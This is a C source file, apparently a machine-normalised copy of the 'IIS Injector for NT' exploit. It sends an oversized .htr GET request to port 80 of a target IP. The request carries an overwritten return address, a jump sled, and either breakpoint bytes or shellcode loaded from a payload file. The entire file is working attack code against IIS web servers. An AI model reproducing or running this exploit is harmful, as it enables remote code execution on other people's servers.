
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_3__ ;
typedef struct TYPE_5__ TYPE_2__ ;
typedef struct TYPE_4__ TYPE_1__ ;


struct sockaddr {int dummy; } ;
typedef int WSADATA ;
struct TYPE_4__ {int S_addr; } ;
struct TYPE_5__ {TYPE_1__ S_un; } ;
struct TYPE_6__ {TYPE_2__ sin_addr; int sin_port; int sin_family; } ;
typedef scalar_t__ SOCKET ;
typedef TYPE_3__ SOCKADDR_IN ;
typedef int FILE ;


 int AF_INET ;
 scalar_t__ INVALID_SOCKET ;
 int IPPROTO_TCP ;
 int MAKEWORD (int,int ) ;
 int SOCK_STREAM ;
 int WSAStartup (int ,int *) ;
 int _snprintf (char*,int,char*) ;
 int closesocket (scalar_t__) ;
 scalar_t__ connect (scalar_t__,struct sockaddr*,int) ;
 int exit (int ) ;
 int fclose (int *) ;
 int feof (int *) ;
 char fgetc (int *) ;
 int * fopen (char*,char*) ;
 int fprintf (int ,char*,char*) ;
 int htons (int) ;
 int inet_addr (char*) ;
 int send (scalar_t__,char*,int ,int ) ;
 scalar_t__ socket (int ,int ,int ) ;
 int stderr ;
 int strlen (char*) ;

void main(int argc, char **argv)
{
        SOCKET s = 0;
        WSADATA wsaData;

        if(argc < 2)
        {
                fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " "http://www.rootkit.com\nUsage: %s <target" "ip> <optional payload file>\n", argv[0]);


                exit(0);
        }

        WSAStartup(MAKEWORD(2,0), &wsaData);

        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(INVALID_SOCKET != s)
        {
                SOCKADDR_IN anAddr;
                anAddr.sin_family = AF_INET;
                anAddr.sin_port = htons(80);
                anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

                if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
                {
                        static char theSploit[4096];

                        char kick = 'z';
                        char place = 'A';


                        for(int i=0;i<4096;i+=4)
                        {
                                theSploit[i] = kick;
                                theSploit[i+1] = place;
                                theSploit[i+2] = place + 1;
                                theSploit[i+3] = place + 2;

                                if(++place == 'Y')
                                {
                                        place = 'A';
                                        if(--kick < 'a') kick = 'a';
                                }
                        }

                        _snprintf(theSploit, 5, "get /");
                        _snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");







                        theSploit[598] = (char)0xF0;
                        theSploit[599] = (char)0x8C;
                        theSploit[600] = (char)0xF8;
                        theSploit[601] = (char)0x77;





                        theSploit[594] = (char)0x90;
                        theSploit[595] = (char)0xEB;
                        theSploit[596] = (char)0x35;
                        theSploit[597] = (char)0x90;







                        if(argc < 3)
                        {
                                theSploit[650] = (char) 0x90;
                                theSploit[651] = (char) 0x90;
                                theSploit[652] = (char) 0x90;
                                theSploit[653] = (char) 0x90;
                                theSploit[654] = (char) 0xCC;
                                theSploit[655] = (char) 0xCC;
                                theSploit[656] = (char) 0xCC;
                                theSploit[657] = (char) 0xCC;
                                theSploit[658] = (char) 0x90;
                                theSploit[659] = (char) 0x90;
                                theSploit[660] = (char) 0x90;
                                theSploit[661] = (char) 0x90;
                        }
                        else
                        {



                                FILE *in_file;
                                in_file = fopen(argv[2], "rb");
                                if(in_file)
                                {
                                        int offset = 650;
                                        while( (!feof(in_file)) && (offset < 3000))
                                        {
                                                theSploit[offset++] = fgetc(in_file);
                                        }
                                        fclose(in_file);
                                }
                        }
                        send(s, theSploit, strlen(theSploit), 0);
                }
                closesocket(s);
        }
}
